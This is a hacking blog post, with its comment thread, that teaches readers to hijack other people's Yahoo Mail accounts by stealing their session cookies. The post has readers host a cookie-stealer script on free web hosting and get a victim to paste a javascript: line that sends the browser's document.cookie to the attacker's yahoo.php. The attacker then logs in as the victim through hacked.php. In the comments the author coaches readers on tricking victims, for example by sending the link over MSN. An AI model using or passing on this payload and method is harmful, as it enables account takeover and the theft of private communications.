Hack Yahoo Accounts By Stealing Session Cookies

What are cookies?
A cookie is a small piece of text sent to your browser by a website when you visit. It contains information about your visit that you may want the site to remember. These cookies can be stored in your browser.you can see your cookies by typing the following script in your browser.


javascript:alert(document.cookie);                                                                                                                    

Session and session IDs:
Whenever we login to our account, our session starts and it will be ended when we press the logout button.i.e the duration between the login and logout can be called as a session.A session ID is a unique number that a Web site's server  assigns a specific user for the duration of that user's visit(session ).

Procedure to steal cookies:

1. First download the Cookiestealer script from Here


2. Sign up for an account in any free webhosting site.
 
 Examples  
 www.ripway.com
 www.my3gb.com
 www.drivehq.com

3. Upload all the scripts you have downloaded onto the free webhosting site and create an empty directiry and name it "cookies".

4. Give the code "yahoo.php" to your victim by using the following script and prompt him to run it in his browser.
       javascript:document.location='http://yourdomain.com/yahoo.php?  
       ex='.concat(escape(document.cookie));
5. Now open hacked.php in your freewebhosting site. (check "readme" file for the password).    


6. After entering the password,it shows you the username of the account you have hijacked. Just click on it, you will be logged in.

NOTE: You can check try this by using two browsers. Take one browser as victim's and the second one as your's.


About The Author
This article is written by Srinivas , He is the owner of  Hackinginception where he writes articles related to hacking .This is his very first Guest post @Hackaholic . If your interested in writing a guest post please contact me 

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Anonymous

The script:
javascript:alert(document.cookie);
doesn't work...

N i don't get you on step 4, how to do it?

REPLY
Anonymous

make sure your java script is ON in your browser.. or try with different browser.

In the fourth step, you need to give the script provided in the post to your victim.
It means, you are giving the yahoo.php file to your victim which is already uploaded onto a free webhosting site by YOU.

that script is to steal victim's cookies. Those cookies will be stored in your "cookies" directory..

REPLY
Devendra said on October 3, 2011 at 7:55 AM :

It will Fail in case OF SSL / Secured https !!!

REPLY
srinivas

@devendra

ya... it has it's own countermeasures... if the victim is using "private browsing" option in his browser, the attack fails.

if the victim locks his cookies... then also this attack fails..

REPLY
windows live said on October 4, 2011 at 12:41 PM :

Hi ,
I could not understand the 4th step . what do you mean ? you mean user is using yahoo mail and i will give him a link by any mean using msn or what ever and then he will move to my site and then i will steal his cookie
please explain

REPLY
srinivas

@windows live

Ya you are correct.. User should be using his yahoo mail... you should give him the link by any mean using msn or whatever.

Now he has to run that script(you have given) in his browser(same tab-yahoo mail).

Once if he runs the script in his browser, he will be redirected to his yahoo account again..

Now open hacked.php file in your web hosting site....you should see his username there... click on that username.. you will login into his account directly without password..

REPLY
srinivas

@windows live

Leave a comment still if u dont understand..

REPLY
Anonymous

what is the usew of creating a directory named cookie..?

REPLY
windows live said on October 6, 2011 at 6:52 AM :

Hi,
Now he has to run that script(you have given) in his browser(same tab-yahoo mail).
what does this mean in same tab yahoo email , i think if he using the fire fox the in any fire fox window he can open it and it will work but if he using the firfox for yahoo and opens this link in chromoe/ IE then this trick will not work , innit ?

Now open hacked.php file in your web hosting site....you should see his username there... click on that username

how to click on that user name so that i could be login automaticaly ?

plus i am not getting auto reply email if someone comments on this article , why ? should i need to do , but i think its missing from your side.

thanks

REPLY
srinivas

@windows live

Now he has to run that script(you have given) in his browser(same tab-yahoo mail).
what does this mean in same tab yahoo email , i think if he using the fire fox the in any fire fox window he can open it and it will work but if he using the firfox for yahoo and opens this link in chromoe/ IE then this trick will not work , innit ?


Let us say he is using FIREFOX(only firefox)..forget about other browsers...
He has opened yahoo mail in TAB-1
He has opened hackaholic in TAB-2(just to understand)
And the remaining TABs are free...

same tab means... he has to run the script in TAB-1..

Because.... see the script (document.cookie)
You can steal the cookies of a single document..
One TAB=one DOCUMENT..



how to click on that user name so that i could be login automaticaly ?


See the pic at sixth step..
The part that was MASKED(black in color) is the USERNAME...
You just give single click on that...
You will be in his account..

REPLY
srinivas

@Anonymous

Victims's stolen cooikes will be stored in this directory..

REPLY
Anonymous

Thanks for this wonderful article.. However I hav this question.. Im really sorry if it sounds too stupid

Do i have to modify the url in any way as I hv uploaded the script on drive hq. com

http://yourdomain.com/yahoo.php?

Do i have to modify the above?

REPLY
Anonymous

please put an video bro..then we can understand easily

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger